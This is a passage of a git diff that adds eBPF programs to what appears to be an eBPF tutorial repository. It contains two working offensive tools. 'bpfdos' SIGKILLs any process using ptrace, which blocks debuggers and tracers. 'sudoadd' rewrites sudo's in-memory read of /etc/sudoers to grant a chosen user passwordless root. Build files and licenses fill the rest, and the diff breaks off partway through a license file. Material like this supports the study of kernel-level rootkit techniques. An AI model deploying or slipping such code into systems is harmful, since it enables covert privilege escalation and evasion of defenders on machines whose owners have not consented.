application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/src/25-signal/bpfdos.bpf.c b/src/25-signal/bpfdos.bpf.c new file mode 100644 index 0000000..4c83a41 --- /dev/null +++ b/src/25-signal/bpfdos.bpf.c @@ -0,0 +1,49 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +SEC("tp/syscalls/sys_enter_ptrace") +int bpf_dos(struct trace_event_raw_sys_enter *ctx) +{ + long ret = 0; + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Send signal. 9 == SIGKILL + ret = bpf_send_signal(9); + + // Log event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + return 0; +} diff --git a/src/25-signal/bpfdos.c b/src/25-signal/bpfdos.c new file mode 100644 index 0000000..062a1c9 --- /dev/null +++ b/src/25-signal/bpfdos.c @@ -0,0 +1,129 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include "bpfdos.skel.h" +#include "common_um.h" +#include "common.h" + +// Setup Argument stuff +static struct env { + int target_ppid; +} env; + +const char *argp_program_version = "bpfdos 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"BPF DOS\n" +"\n" +"Sends a SIGKILL to any program attempting to use\n" +"the ptrace syscall (e.g. strace)\n" +"\n" +"USAGE: ./bpfdos [-t 1111]\n"; + +static const struct argp_option opts[] = { + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Killed PID %d (%s) for trying to use ptrace syscall\n", e->pid, e->comm); + else + printf("Failed to kill PID %d (%s) for trying to use ptrace syscall\n", e->pid, e->comm); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct bpfdos_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = bpfdos_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Set target ppid + skel->rodata->target_ppid = env.target_ppid; + + // Verify and load program + err = bpfdos_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Attach tracepoint handler + err = bpfdos_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + printf("Sending SIGKILL to any program using the bpf syscall\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + bpfdos_bpf__destroy( skel); + return -err; +} diff --git a/src/25-signal/common.h b/src/25-signal/common.h new file mode 100644 index 0000000..4686d92 --- /dev/null +++ b/src/25-signal/common.h @@ -0,0 +1,35 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/src/25-signal/common_um.h b/src/25-signal/common_um.h new file mode 100644 index 0000000..06267aa --- /dev/null +++ b/src/25-signal/common_um.h @@ -0,0 +1,96 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_UM_H +#define BAD_BPF_COMMON_UM_H + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + + +#ifdef BAD_BPF_USE_TRACE_PIPE +static void read_trace_pipe(void) { + int trace_fd; + + trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0); + if (trace_fd == -1) { + printf("Error opening trace_pipe: %s\n", strerror(errno)); + return; + } + + while (!exiting) { + static char buf[4096]; + ssize_t sz; + + sz = read(trace_fd, buf, sizeof(buf) -1); + if (sz > 0) { + buf[sz] = '\x00'; + puts(buf); + } + } +} +#endif // BAD_BPF_USE_TRACE_PIPE + +#endif // BAD_BPF_COMMON_UM_H \ No newline at end of file diff --git a/src/26-sudo/.gitignore b/src/26-sudo/.gitignore new file mode 100644 index 0000000..81acd4b --- /dev/null +++ b/src/26-sudo/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +textreplace2 diff --git a/src/26-sudo/LICENSE b/src/26-sudo/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/src/26-sudo/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/src/26-sudo/Makefile b/src/26-sudo/Makefile new file mode 100644 index 0000000..ecfd9e1 --- /dev/null +++ b/src/26-sudo/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/src/26-sudo/common.h b/src/26-sudo/common.h new file mode 100644 index 0000000..4686d92 --- /dev/null +++ b/src/26-sudo/common.h @@ -0,0 +1,35 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/src/26-sudo/common_um.h b/src/26-sudo/common_um.h new file mode 100644 index 0000000..06267aa --- /dev/null +++ b/src/26-sudo/common_um.h @@ -0,0 +1,96 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_UM_H +#define BAD_BPF_COMMON_UM_H + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + + +#ifdef BAD_BPF_USE_TRACE_PIPE +static void read_trace_pipe(void) { + int trace_fd; + + trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0); + if (trace_fd == -1) { + printf("Error opening trace_pipe: %s\n", strerror(errno)); + return; + } + + while (!exiting) { + static char buf[4096]; + ssize_t sz; + + sz = read(trace_fd, buf, sizeof(buf) -1); + if (sz > 0) { + buf[sz] = '\x00'; + puts(buf); + } + } +} +#endif // BAD_BPF_USE_TRACE_PIPE + +#endif // BAD_BPF_COMMON_UM_H \ No newline at end of file diff --git a/src/26-sudo/sudoadd.bpf.c b/src/26-sudo/sudoadd.bpf.c new file mode 100644 index 0000000..3e81b80 --- /dev/null +++ b/src/26-sudo/sudoadd.bpf.c @@ -0,0 +1,217 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to hold the File Descriptors from 'openat' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, unsigned int); +} map_fds SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buff_addrs SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// The UserID of the user, if we're restricting +// running to just this user +const volatile int uid = 0; + +// These store the string we're going to +// add to /etc/sudoers when viewed by sudo +// Which makes it think our user can sudo +// without a password +const int max_payload_len = 100; +const volatile int payload_len = 0; +const volatile char payload[max_payload_len]; + +SEC("tp/syscalls/sys_enter_openat") +int handle_openat_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Check comm is sudo + char comm[TASK_COMM_LEN]; + bpf_get_current_comm(comm, sizeof(comm)); + const int sudo_len = 5; + const char *sudo = "sudo"; + for (int i = 0; i < sudo_len; i++) { + if (comm[i] != sudo[i]) { + return 0; + } + } + + // Now check we're opening sudoers + const int sudoers_len = 13; + const char *sudoers = "/etc/sudoers"; + char filename[sudoers_len]; + bpf_probe_read_user(&filename, sudoers_len, (char*)ctx->args[1]); + for (int i = 0; i < sudoers_len; i++) { + if (filename[i] != sudoers[i]) { + return 0; + } + } + bpf_printk("Comm %s\n", comm); + bpf_printk("Filename %s\n", filename); + + // If filtering by UID check that + if (uid != 0) { + int current_uid = bpf_get_current_uid_gid() >> 32; + if (uid != current_uid) { + return 0; + } + } + + // Add pid_tgid to map for our sys_exit call + unsigned int zero = 0; + bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_exit_openat") +int handle_openat_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + int pid = pid_tgid >> 32; + + // Set the map value to be the returned file descriptor + unsigned int fd = (unsigned int)ctx->ret; + bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_enter_read") +int handle_read_enter(struct trace_event_raw_sys_enter *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (pfd == 0) { + return 0; + } + + // Check this is the sudoers file descriptor + unsigned int map_fd = *pfd; + unsigned int fd = (unsigned int)ctx->args[0]; + if (map_fd != fd) { + return 0; + } + + // Store buffer address from arguments in map + long unsigned int buff_addr = ctx->args[1]; + bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY); + + // log and exit + size_t buff_size = (size_t)ctx->args[2]; + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int handle_read_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is reading our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + long unsigned int buff_addr = *pbuff_addr; + if (buff_addr <= 0) { + return 0; + } + + // This is amount of data returned from the read syscall + if (ctx->ret <= 0) { + return 0; + } + long int read_size = ctx->ret; + + // Add our payload to the first line + if (read_size < payload_len) { + return 0; + } + + // Overwrite first chunk of data + // then add '#'s to comment out rest of data in the chunk. + // This sorta corrupts the sudoers file, but everything still + // works as expected + char local_buff[max_payload_len] = { 0x00 }; + bpf_probe_read(&local_buff, max_payload_len, (void*)buff_addr); + for (unsigned int i = 0; i < max_payload_len; i++) { + if (i >= payload_len) { + local_buff[i] = '#'; + } + else { + local_buff[i] = payload[i]; + } + } + // Write data back to buffer + long ret = bpf_probe_write_user((void*)buff_addr, local_buff, max_payload_len); + + // Send event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + return 0; +} + +SEC("tp/syscalls/sys_exit_close") +int handle_close_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check if we're a process thread of interest + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + + // Closing file, delete fd from all maps to clean up + bpf_map_delete_elem(&map_fds, &pid_tgid); + bpf_map_delete_elem(&map_buff_addrs, &pid_tgid); + + return 0; +} diff --git a/src/26-sudo/sudoadd.c b/src/26-sudo/sudoadd.c new file mode 100644 index 0000000..fc6e1f3 --- /dev/null +++ b/src/26-sudo/sudoadd.c @@ -0,0 +1,175 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include "sudoadd.skel.h" +#include "common_um.h" +#include "common.h" +#include + +#define INVALID_UID -1 +// https://stackoverflow.com/questions/3836365/how-can-i-get-the-user-id-associated-with-a-login-on-linux +uid_t lookup_user(const char *name) +{ + if(name) { + struct passwd *pwd = getpwnam(name); /* don't free, see getpwnam() for details */ + if(pwd) return pwd->pw_uid; + } + return INVALID_UID; +} + +// Setup Argument stuff +#define max_username_len 20 +static struct env { + char username[max_username_len]; + bool restrict_user; + int target_ppid; +} env; + +const char *argp_program_version = "sudoadd 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"SUDO Add\n" +"\n" +"Enable a user to elevate to root\n" +"by lying to 'sudo' about the contents of /etc/sudoers file\n" +"\n" +"USAGE: ./sudoadd -u username [-t 1111] [-r uid]\n"; + +static const struct argp_option opts[] = { + { "username", 'u', "USERNAME", 0, "Username of user to " }, + { "restrict", 'r', NULL, 0, "Restict to only run when sudo is executed by the matching user" }, + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 'u': + if (strlen(arg) >= max_username_len) { + fprintf(stderr, "Username must be less than %d characters\n", max_username_len); + argp_usage(state); + } + strncpy(env.username, arg, sizeof(env.username)); + break; + case 'r': + env.restrict_user = true; + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case 'h': + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Tricked Sudo PID %d to allow user to become root\n", e->pid); + else + printf("Failed to trick Sudo PID %d to allow user to become root\n", e->pid); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct sudoadd_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + if (env.username[0] == '\x00') { + printf("Username Requried, see %s --help\n", argv[0]); + exit(1); + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = sudoadd_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Let bpf program know our pid so we don't get kiled by it + skel->rodata->target_ppid = env.target_ppid; + + // Copy in username + sprintf(skel->rodata->payload, "%s ALL=(ALL:ALL) NOPASSWD:ALL #", env.username); + skel->rodata->payload_len = strlen(skel->rodata->payload); + + // If restricting by UID, look it up and set it + // as this can't really be done by eBPF program + if (env.restrict_user) { + int uid = lookup_user(env.username); + if (uid == INVALID_UID) { + printf("Couldn't get UID for user %s\n", env.username); + goto cleanup; + } + skel->rodata->uid = uid; + } + + // Verify and load program + err = sudoadd_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Attach tracepoint handler + err = sudoadd_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + sudoadd_bpf__destroy( skel); + return -err; +} diff --git a/src/27-replace/.gitignore b/src/27-replace/.gitignore new file mode 100644 index 0000000..81acd4b --- /dev/null +++ b/src/27-replace/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +textreplace2 diff --git a/src/27-replace/LICENSE b/src/27-replace/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/src/27-replace/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, 